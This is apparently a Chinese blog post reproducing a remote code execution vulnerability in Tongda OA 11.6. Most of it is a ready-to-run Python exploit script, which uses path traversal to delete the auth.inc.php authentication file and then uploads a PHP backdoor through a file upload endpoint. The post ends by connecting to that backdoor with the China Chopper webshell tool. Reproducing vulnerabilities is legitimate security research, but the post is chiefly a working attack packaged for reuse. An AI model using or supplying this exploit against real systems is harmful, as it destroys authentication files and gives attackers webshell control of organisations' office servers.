漏洞复现系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)

一、影响版本 11.6
二、复现过程
1.下载11.6版本oa,下载地址:http://www.kxdw.com/soft/23114.html
2.安装
漏洞复现系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)_第1张图片
漏洞复现系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)_第2张图片
漏洞复现系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)_第3张图片
漏洞复现系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)_第4张图片
3.exp脚本

import requests
target="http://ip:port/"     //此处填写上面安装oa的ip及端口
payload=""
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url,files=files)
url=target+"/_deconf.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

4.然后执行该exp的效果如下图
漏洞复现系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)_第5张图片
5.用菜刀连接该后门,如下
漏洞复现系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)_第6张图片

你可能感兴趣的:(漏洞复现)